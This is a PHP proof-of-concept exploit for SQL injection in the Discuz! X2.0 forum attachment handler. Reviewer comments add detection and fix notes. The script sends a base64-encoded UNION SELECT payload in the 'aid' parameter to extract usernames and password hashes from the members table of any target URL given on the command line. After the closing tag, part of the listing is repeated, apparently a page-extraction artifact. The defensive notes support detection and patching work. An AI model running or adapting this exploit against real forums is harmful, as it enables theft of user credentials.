<?php
// Proof-of-concept for a SQL injection in the Discuz! X2.0 attachment handler,
// as published. Usage per the banner: argv[1] = forum base URL, argv[2] = a
// username prefix. The script sends one GET request and prints only
// "Start"/"End"; the HTTP response is not read or displayed.
//
// Defender notes (review):
//  - The injected SQL travels base64-encoded inside the `aid` query parameter,
//    so filters that pattern-match the raw query string will not see SQL
//    keywords. Detection has to base64-decode `aid` on requests to
//    forum.php?mod=attachment and then look for a quote character,
//    `union all select`, `pre_common_member`, or the literal 0x7C3274747C.
//  - Presumably the handler decodes `aid` and places part of it into a query
//    without escaping or integer-casting it. Confirm against the handler
//    source. The durable fix is to validate or cast the decoded fields, or
//    bind them as parameters, and to run a vendor-fixed Discuz! release.
//  - The query targets account names and password hashes. If access logs
//    show matching requests, treat those credentials as exposed and reset them.
echo "Discuz! X2.0
0day EXP\n";
echo "By:Steeltiger \n";
echo "php.exe dz2exp.php http://www.xxx.com/ admin\n";
// Proceed only when both command-line arguments are present and non-empty.
if(!empty($argv[1]) &&!empty($argv[2]))
{
echo "Start\n";
// Payload: closes the quoted value, forces the original SELECT to match no
// rows (`and 1=2`), then appends a UNION reading username and password from
// pre_common_member, filtered by the argv[2] prefix. 0x7C3274747C is the hex
// form of the separator string "|2tt|". The table name is hard-coded with the
// `pre_` prefix. The trailing `|x|y` presumably fills the remaining
// pipe-separated fields the handler expects. TODO confirm.
$exp = base64_encode("1' and 1=2 union all select 1,group_concat(username,0x7C3274747C,password) from pre_common_member where username like '".$argv[2]."|x|y");
// Endpoint and fixed parameters that carry the payload: mod=attachment, findpost=ss, aid=<base64>.
$url = "forum.php?mod=attachment&findpost=ss&aid=";
// Single GET request: base URL + path + encoded payload. The return value is discarded.
file_get_contents($argv[1].$url.$exp);
echo "End\n";
}
// Everything after the closing tag below is outside PHP mode. It is a partial
// repeat of the listing above (likely a page-extraction artifact) and would be
// emitted as literal text rather than executed.
?>
echo "By:Steeltiger \n";
echo "php.exe dz2exp.php http://www.xxx.com/ admin\n";
if(!empty($argv[1]) &&!empty($argv[2]))
{
echo "Start\n";
$exp = base64_encode("1' and 1=2 union all select 1,group_concat(username,0x7C3274747C,password) from pre_common_member where username like '".$argv[2]."|x|y");
$url = "forum.php?mod=attachment&findpost=ss&aid=";
file_get_contents($argv[1].$url.$exp);
echo "End\n";
}
?>